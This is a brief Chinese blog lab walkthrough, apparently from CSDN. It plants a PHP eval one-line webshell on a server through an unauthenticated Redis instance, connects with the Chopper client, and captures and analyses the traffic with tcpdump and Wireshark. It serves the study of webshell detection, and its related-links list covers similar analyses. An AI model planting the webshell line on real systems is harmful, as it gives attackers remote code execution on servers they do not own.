webshell与wireshark

最新推荐文章于 2023-05-15 10:50:26 发布
最新推荐文章于 2023-05-15 10:50:26 发布
阅读量508 收藏
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fort____339/article/details/102652411
版权
本文介绍了在一个环境配置了php、redis和apache服务的场景下,如何通过浏览器访问触发redis未授权漏洞,植入并利用一句话木马。接着,通过在Windows端使用chopper工具连接到webshell,查看服务器文件。随后,在虚拟机中运用tcpdump抓包,并使用wireshark进行深入的网络流量分析。
摘要由CSDN通过智能技术生成

环境需求:php服务、redis服务、apache服务开启
浏览器访问:服务器IP/index.php

在这里插入图片描述

利用redis未授权漏洞,进入redis交互模式,输入一句话木马

<?php @eval($_POST['123']);?>

浏览器访问:服务器IP/qwe.php

在这里插入图片描述

在windows端 使用chopper进行连接

在这里插入图片描述

点击进入,可以看到其中文件

在这里插入图片描述

进入虚拟终端:

在这里插入图片描述

在虚拟机使用tcpdump进行抓包

tcpdump -i eth0 -w 111.pcap

使用wireshark进行分析

在这里插入图片描述

Fort____339
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WireShark流量分析(中国菜刀,webshell
oJiuJieZhong的博客
02-12 4222
首先拿到这个流量包,还是先对整个包中的帧进行初步的查看,发现为大量的TCP数据帧和HTTP数据帧。 网络攻击一般来自于web,是web那就一定有http,接下来对http进行筛选 发现为大量的GET请求,GET请求在实质性的破坏上比POST请求的破坏性小,那接下来再进行对POST请求的筛选。 发现一个很特殊的数据帧,在访问xiaoma.php,并且一般用户是不会访问到upload文件夹的,接下来对此IP进行筛选,方便查看。 攻击者通过提前上传一个webshell文件(xiaoma.php),接下来通
2021-10-02 陇剑杯webshell WP 关于wireshark使用
m0_51170293的博客
10-08 1291
陇剑杯webshell WP 借此熟悉完整的渗透流程 黑客登录系统使用的密码是__Admin123!@# 搜password 黑客修改了一个日志文件文件的绝对路径为_/var/www/html/data/Runtime/Logs/Home/21_08_07.log。 可能是搜索log 黑客获取webshell之后,权限是_www-data__ 其中web根目录可以再system命令中看到 黑客写入的webshell文件名是___1.php___。 右键复制值 Form item: “aaa”
Wireshark分析获取Webshell流量包
weixin_30898109的博客
05-27 1942
导出对象为http,观察文件名,发现对conf1g.php的访问多的异常 发现他在爆破,爆破一般情况下在最后的密码是正确的密码,得到密码youxiu 爆破成功后进入木马界面 在最后一个包中发现jpg 使用16进制编辑器打开发现flag 转载于:https://www.cnblogs.com/wanao/p/10930478.html...
抓包拿Webshell教程
08-13
新思路 抓包拿Webshell教程 通过监听端口突破上传
Webshell之蚁剑流量分析
最新发布
qq_51323560的博客
05-15 2323
--------------------------------------------------------------------------------------------------------------------------------第一次学习webshell流量分析,还请大佬们多多指教。参数1,str参数是指将要进行截取字符操作的字符串。参数3, length参数是说明本次截取操作的长度,(2)分析发现真正有效的字符串是去除头部的2个字母。(3)查看虚拟终端执行的命令。
《网络安全应急响应技术实战指南》知识点总结(第6章 webshell网络安全应急响应)
qiuqiunile_的博客
03-26 4343
一、webshell概述 webshell通常指以JSP、ASP、PHP等网页脚本文件形式存在的一种服务器可执行文件,一般带有文件操作、执行命令功能,是一种网页后门。攻击者在入侵一个网站后,通常会将webshell后门文件与网站服务web目录下正常的网页文件混在一起,使用浏览器或专用客户端进行连接,从而得到一个服务器操作环境,以达到控制网站服务器的目的。 二、webshell分类 1、JSP型webshell脚本 全称Java Server Pages,是一种动态web资源的开发技术。JSP是在传统的网页H
webshell数据分析环境
10-08
本话题聚焦于“webshell数据分析环境”,特别是使用Wireshark进行网络数据包分析。 Wireshark是一款强大的网络封包分析软件,它可以捕获网络流量并深入解析多种协议,帮助网络安全专家检测潜在的威胁。在分析...
抓包拿webshell教材
04-07
5. **隐藏与持久化**:为了防止被发现,攻击者可能会对Webshell进行加密、混淆,或者将其伪装成正常文件,以确保长期控制。 "抓包教程.txt"可能包含了具体的操作步骤、技巧和示例,教导读者如何有效地进行抓包以及...
利用抓包拿WEBSHELL
05-06
抓包是网络分析的一种方法,通过特殊的软件(如Wireshark、Tcpdump等)捕获并记录在网络中传输的数据包。这些数据包包含了网络通信的各种信息,如源IP地址、目标IP地址、端口号以及数据内容。通过分析这些数据包,...
CTF工具之wireshark(misc).rar
09-16
此工具用于学习交流用途,切勿用于其它用途。
webshell.pcapng
11-11
webshell.pcapng
常见工具 nc Wireshark反弹shell
代码审计
04-20 1160
常⽤⼯具 • 经常使⽤且功能强⼤ • 安全从业者必不可少的帮⼿ • Nc / ncat • Wireshark • Tcpdump nc -lvp 使用nc 监听特定的端口 nc -nv ip port 连接特定ip下的指定端口 NETCAT ——NC • ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧 • 侦听模式 / 传输模式 • telnet / 获取banner信息 • 传输⽂本信息 • 传输⽂件/⺫录 • 加密传输⽂件 • 远程控制/⽊⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘 root@
网络数据分析溯源(WebShell密码)
qq_36933272的博客
09-05 1555
wireshark打开数据包 有题目提示,有人连接过一句话的webshell,猜想可能是asp、php之类的木马 用http.request.method ==“POST” && http contains "php"尝试过滤,发现xiaoma.php 查看发现d76R3478就是webshell的密码 输入密码,得到key ...
WebShell简介
YJ_12340的博客
08-08 1616
• JSP类型• ASP类型• PHP类型。
WebShell工具特征流量分析合集
爱吃仡坨的Blog
10-25 1644
通过编码的数据包1特征,发现是URL编码(BP会自动对其解码显示)还可以通过解码网站对其进行解码,之后分析数据包特征如下图,发现通过蚁剑终端传参之后得到的响应包任然是明文的。
web渗透—wireshark过滤
dongxie_tk的博客
11-01 452
1.过滤IP,如来源IP或者目标IP等于某个IP 例子: ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107 或者 ip.addr eq 192.168.1.107 // 都能显示来源IP和目标IP 2.过滤端口 例子: tcp.port eq 80 // 不管端口是来源的还是目标的都显示 tcp.port == 80 tcp.p
2021-05-03Wireshark流量包分析
m0_37442062的博客
05-03 3217
目录 WEB扫描分析 后台目录爆破分析 后台账号爆破 WEBSHELL上传 其他题目 参考链接 WEB数据包分析的题目主要出现WEB攻击行为的分析上, 典型的WEB攻击行为有:WEB扫描、后台目录爆破、后台账号爆破、WEBSHELL上传、SQL注入等等。 WEB扫描分析 题型: 通过给出的流量包获取攻击者使用的WEB扫描工具。 解题思路: 常见的WEB扫描器有Awvs,Netsparker,Appscan,Webinspect,Rsas(绿盟极光),Nessus,We...
【转】Webshell入侵检测初探
tpriwwq的专栏
06-13 1534
0×01:Webshell简介 攻击者在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。常见攻击方式有:直接上传获取webshell、SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本(XSS)作为攻击的一部分,甚至一些比较老旧的方法利用后台数据库备份及恢复获取webshell、数据库压缩等。通用功能包括但不限于shell命...
攻防世界心仪的公司
淡巴枯的博客
10-08 398
【代码】攻防世界心仪的公司。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值